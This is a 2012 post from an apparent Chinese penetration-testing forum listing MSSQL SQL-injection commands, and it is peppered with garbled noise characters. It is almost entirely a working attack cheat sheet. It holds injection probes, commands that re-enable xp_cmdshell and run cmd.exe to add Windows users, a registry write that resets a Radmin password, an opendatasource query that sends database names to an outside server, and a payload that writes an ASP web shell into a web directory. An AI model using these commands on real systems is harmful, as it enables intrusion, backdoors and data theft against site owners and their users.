中国网络渗透测试联盟

标题: 常用的一些注入命令 [打印本页]

作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的. h2 C7 A, {2 B# a, c+ _
and 1=(Select IS_MEMBER('db_owner'))
( G8 l+ [+ F' r, ?# o5 R. @And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--  _4 W7 n2 H8 j# q8 v* j- S! m
1 l! M. m! q" x- Y) F0 ?6 _2 B
//检测是否有读取某数据库的权限
* |+ a2 |/ ~7 n& b( t6 W6 K3 ~and 1= (Select HAS_DBACCESS('master'))
  o+ C5 x5 h3 u4 M+ ?# I% rAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --+ d5 Z4 H6 V& E6 b! g
0 @) W6 d9 f1 U! ^- W: h

; \0 l3 Y! v9 o数字类型
; o+ a# J, c7 I+ I( g+ wand char(124)%2Buser%2Bchar(124)=0! I" |) E1 @! V' l$ L, d

' r3 W/ h5 i8 |& x& \. d3 L( Q字符类型8 A; ]0 p  B2 _" h, {6 d( R
' and char(124)%2Buser%2Bchar(124)=0 and ''='
$ E- c9 g0 S7 [
1 @' P/ l" p- I! {9 e搜索类型
4 K3 B# b1 t3 R: x5 ]' and char(124)%2Buser%2Bchar(124)=0 and '%'='
# `- u7 w( N* Y+ Y* C9 S1 f6 A/ ]" ~6 i4 m$ ?/ q. t  n6 z4 \
爆用户名% i0 X' z% A. D7 M7 B" ^9 M, U
and user>0
9 J6 s, M9 n6 m) F+ L' and user>0 and ''='
7 b1 H; m, V+ S! I$ x1 g$ z+ h
检测是否为SA权限
0 r  z0 h/ u) o- L2 Sand 1=(select IS_SRVROLEMEMBER('sysadmin'));--! d0 }9 @* Q, K
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
4 h) L. ]2 j& S4 h% z* L4 F5 w$ Z# D  Z1 O/ C" @4 [
检测是不是MSSQL数据库' w. `9 H: Y; e, n+ Y/ P
and exists (select * from sysobjects);--  F  y7 R+ j* r/ H5 |

( w% C& `& z4 v检测是否支持多行8 i8 @) S# u0 n# n' K9 ?% C" p
;declare @d int;--" N+ ?5 I' R( d5 ]" Y

5 r$ u. h1 I- a7 h3 W恢复 xp_cmdshell5 B/ w  P3 e6 m. ^, s9 Q& C# c
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--5 z* M. h7 J, [+ E( ?2 Z4 [; h

& q1 B2 t0 v2 u  `6 {
* m4 W2 s, A9 V# z, Jselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
3 d$ r+ X) _4 \4 c9 d; Q6 B7 V' V! Z; M9 C2 s. |7 D
//-----------------------# z2 a1 b- l# @6 U( e5 \
//       执行命令
& y3 {9 g7 F6 }& y4 q- E//-----------------------
7 f  S" o8 s  N3 C8 }首先开启沙盘模式:; `( i2 }) o1 d0 I% j$ D
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
2 K) s0 z7 K3 ?2 B9 t+ v
6 A! M$ s) U$ V& _8 z: Q7 a然后利用jet.oledb执行系统命令' `5 j  w2 q8 Z  \) H1 r
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
7 l4 r+ N, v( O) h) {+ U$ _' e. t: d" ~: a: c; {
执行命令6 X6 N8 f7 m0 l* @' N( g
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
% Q- k5 Q- a: @" u+ r0 l
+ M8 ~8 ?1 O* R' g2 nEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
8 E; l, |, y% U. I5 R' @, h1 Z, Q- C' A
判断xp_cmdshell扩展存储过程是否存在:
4 l" j; V3 h8 ~) Nhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')" f/ z6 q; a3 ]1 S& W+ @

. C  S" o. `+ A. u+ E写注册表9 d  C& V/ g+ K+ m
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',11 A, L6 }# q- V3 B/ r
& V$ c, L# C5 H( @: O
REG_SZ
+ r3 N: K1 v7 ^5 L* j7 K% x% g, ]; P: W5 H4 w6 K2 @
读注册表) d9 h% j% Y* v6 t
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'% d2 }/ K* A  k, c$ O

' P1 z% c7 `+ R  M读取目录内容
, E" K* u+ ^+ e; e# }exec master..xp_dirtree 'c:\winnt\system32\',1,1- }9 x' C7 r" _& ?4 Z; D

+ I/ r- R  @  W9 H
9 m. C& {4 _3 T. p" k% R9 M6 T& d" k数据库备份& X- k. ~$ L* Q$ K
backup database pubs to disk = 'c:\123.bak'  A; s! a9 W$ p  \$ o

% f: s2 u3 q# c* w//爆出长度& L* N4 v' K4 Q
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
: C, h) e# }: W3 m  U) l, P, n  V; S, {, t% e9 ]

1 j3 n5 @  e1 N$ S7 y2 v7 h. ~
' j* W' _) Q( h$ C  f更改sa口令方法:用sql综合利用工具连接后,执行命令:
5 N: J0 Q- X' a6 G. e3 {) Eexec sp_password NULL,'新密码','sa'
( _" i9 O  C2 a8 Z; q( U3 @% W: c) Y4 R% l
添加和删除一个SA权限的用户test:1 ^3 d9 R1 v3 X9 v2 O
exec master.dbo.sp_addlogin test,9530772! x9 R( d1 S! z% o
exec master.dbo.sp_addsrvrolemember test,sysadmin; B$ L+ k* j) F/ u0 Y
. ]5 x7 R8 G8 k* ~
删除扩展存储过过程xp_cmdshell的语句:
: v5 a. j5 \# ?; |  S1 Gexec sp_dropextendedproc 'xp_cmdshell'
/ m( P  c( I% ]1 q& M$ O. o5 T2 A8 I6 K+ @) N) W
添加扩展存储过过程- p5 u3 k5 R6 S7 P
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'( L8 o& s- ^- f; ?" a( R
GRANT exec On xp_proxiedadata TO public* O* N/ M2 N% }2 f
& }8 I, Q1 ?: D

# z% k' b5 K: v3 b  @! D' Y停掉或激活某个服务。
2 ~1 j5 \( T: ~& v! {. M8 I: P) ]/ e- m, W) b* y$ u9 N$ `, D
exec master..xp_servicecontrol 'stop','schedule'% |# H6 _4 m6 h4 R9 @4 V1 e; o
exec master..xp_servicecontrol 'start','schedule'9 ]" s: D" _' e+ F: \+ r

) S& w! x( D$ O* A3 Pdbo.xp_subdirs  b$ [# M  Y% u1 k
5 g8 o& {  ^9 e
只列某个目录下的子目录。
! w" R; ^% \! F# Z2 X+ `# \xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
% U1 e! K) E* ]( u$ S+ Y! u' x% T# I7 z- i
dbo.xp_makecab
' R8 S8 p. d0 t7 U6 b1 }, ~* q, k% N' v3 n) Q" t, p% S
将目标多个档案压缩到某个目标档案之内。
1 i4 H* G% f$ z5 A7 X9 u( Y所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
8 ~1 Z' M: ~! T- i' }, P  s- O* |2 R1 H' A) l
dbo.xp_makecab4 Z4 a9 L& V$ y: z9 N! z/ ?
'c:\test.cab','mszip',1,
! l% v( }6 [) G1 M'C:\Inetpub\wwwroot\SQLInject\login.asp',, v7 M! e- @% @
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
8 ]' g6 j- W! y2 l6 U$ f" S9 m- t
. p; }7 j9 r# D! C; Rxp_terminate_process7 X' P6 B2 Q* ~& T# c
* a* P- [. i/ d8 S
停掉某个执行中的程序,但赋予的参数是 Process ID。4 Y1 w7 B  `4 [) {6 d2 ?" g8 Q
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
9 P+ Y& \5 G9 \9 ]5 U$ D1 H' `8 p: v% u0 G4 Q; ?+ u
xp_terminate_process 2484
6 G  p1 U3 |3 A& e: O" p+ H- m: L, ?/ I2 `0 {
xp_unpackcab1 S1 n3 X+ R$ c7 s
& ~  m8 p% w4 y, P2 l9 |
解开压缩档。: N1 |) y( q9 J) Y. x- _
, \( |( s5 F! U+ u( O3 f3 V% J
xp_unpackcab 'c:\test.cab','c:\temp',1
8 k# v+ R8 h2 n+ ^& y+ ^  m" v2 K9 e6 O$ M$ s1 @

; l/ Z$ P, K1 n  U  l: {某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234# {% ^6 P2 `3 ~& d+ r8 s
/ R$ H* e6 \: e8 _3 g
create database lcx;
# D+ R& d% n& ~  B6 u5 iCreate TABLE ku(name nvarchar(256) null);) t8 B" b  p# d$ H/ _! o& [9 n
Create TABLE biao(id int NULL,name nvarchar(256) null);- D/ {8 @' h) u' B
" L! e6 O2 h# p: \0 c6 b* f- j
//得到数据库名- ~, Y! O) w# Z3 N1 g
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
7 C- @" J9 D; h, y+ g% ^& W& y9 k( H1 B6 s8 q$ h3 X) e' @8 S. P  f
  X9 x) @  v$ v
//在Master中创建表,看看权限怎样
! b2 v  `& r0 f0 i* Z$ D1 C4 r8 S' R' eCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
3 B* ^: f% I* B5 {
6 `1 I9 u) K# r4 J2 T/ E/ Y  z用 sp_makewebtask直接在web目录里写入一句话马:! T6 S1 ^1 x9 E5 }$ l
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--* w) I6 ?% ~* R2 o2 r+ l
; L1 e5 a0 u2 X* e# `1 i7 ?: i
//更新表内容
0 q3 w. X# H/ B4 T. i" @; K5 pUpdate films SET kind = 'Dramatic' Where id = 123
  i$ O- R: @$ k  N1 _- ^, j& i; s$ K4 d
//删除内容' G. q  z9 j+ j' I8 W
delete from table_name where Stockid = 3




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2